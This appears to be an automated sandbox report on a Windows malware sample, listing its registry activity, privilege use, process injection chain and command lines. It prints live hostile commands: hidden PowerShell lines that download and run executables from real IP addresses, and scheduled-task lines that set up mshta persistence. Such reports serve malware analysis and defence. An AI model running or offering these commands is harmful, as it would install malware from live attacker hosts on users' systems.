Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\hvpde\vsigno.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature N/A N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings N/A N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 N/A N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a N/A N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a N/A N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempPCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108710101\435444df89.exe N/A
N/A N/A C:\ProgramData\hvpde\vsigno.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Build.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10108720101\5543c91dc1.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2412 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\cmd.exe
PID 2412 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 2412 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 2412 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 2412 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe C:\Windows\SysWOW64\mshta.exe
PID 1212 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1212 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1212 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1212 wrote to memory of 2400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1048 wrote to memory of 2100 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 2100 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 2100 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 2100 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2100 wrote to memory of 2948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE
PID 2100 wrote to memory of 2948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE
PID 2100 wrote to memory of 2948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE
PID 2100 wrote to memory of 2948 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE
PID 2948 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2948 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1276 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1276 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1276 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1276 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
PID 1956 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1956 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 1956 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe C:\Windows\system32\cmd.exe
PID 2292 wrote to memory of 2052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2292 wrote to memory of 2052 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 1784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 1784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 1784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1276 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1276 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1276 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1276 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
PID 1028 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1028 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1028 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 1028 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
PID 2176 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2176 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2176 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2176 wrote to memory of 1440 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 1276 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 1276 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 1276 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 1276 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe
PID 2400 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2400 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2400 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2400 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Windows\SysWOW64\WScript.exe
PID 2400 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2400 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2400 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2400 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe C:\Users\Admin\AppData\Local\Temp\Build.exe
PID 2720 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\WerFault.exe
PID 2720 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\WerFault.exe
PID 2720 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\Build.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe

"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn B1kz5makRhV /tr "mshta C:\Users\Admin\AppData\Local\Temp\CwH7cSt1O.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\CwH7cSt1O.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn B1kz5makRhV /tr "mshta C:\Users\Admin\AppData\Local\Temp\CwH7cSt1O.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE

"C:\Users\Admin\AppData\Local\Temp6QRX8BGYLURTOD1UXAY1JFC4G6HMOXG8.EXE"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\35B0.tmp\35B1.tmp\35B2.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe

"C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs"

C:\Users\Admin\AppData\Local\Temp\Build.exe

"C:\Users\Admin\AppData\Local\Temp\Build.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 992

C:\Users\Admin\AppData\Local\Temp\10108470101\dafb180ffe.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\dafb180ffe.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn F50cDmaIn5U /tr "mshta C:\Users\Admin\AppData\Local\Temp\198XEs4pd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\198XEs4pd.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn F50cDmaIn5U /tr "mshta C:\Users\Admin\AppData\Local\Temp\198XEs4pd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\TempPCKMBEY3P0XHJVXPFAGTELAJU4UX3T3O.EXE

